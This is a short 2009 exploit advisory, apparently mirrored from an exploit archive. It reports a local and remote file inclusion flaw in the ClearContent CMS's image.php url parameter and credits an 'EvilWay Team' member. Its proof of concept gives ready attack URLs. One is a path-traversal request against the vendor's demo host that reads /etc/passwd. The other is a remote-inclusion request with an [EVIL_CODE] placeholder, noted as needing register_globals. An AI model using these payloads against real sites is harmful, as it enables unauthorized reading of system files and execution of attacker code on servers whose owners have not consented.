ClearContent (image.php url) RFI/LFI Vulnerability

🗓️ 09 Jul 2009 00:00:00Reported by RootType

ClearContent website RFI/LFI Vulnerabilit


                                                ----------------------------------------------------------------------------------------------------

  Name : ClearContent
  Site : http://www.allisclear.com/

  Demo : http://demo.allisclear.com/

----------------------------------------------------------------------------------------------------

 
  Found By : MizoZ [EvilWay Team]

  Made in  : Morocco
  Contact  : mizozx[at]gmail[dot]com
  Greetz   : Moudi , Zuka , All friends


----------------------------------------------------------------------------------------------------


  P0c:
 
    LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
    RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???


 RFI needs register_globals=on;

----------------------------------------------------------------------------------------------------

# sebug.net

09 Jul 2009 00:00Current

7.1High risk

Vulners AI Score7.1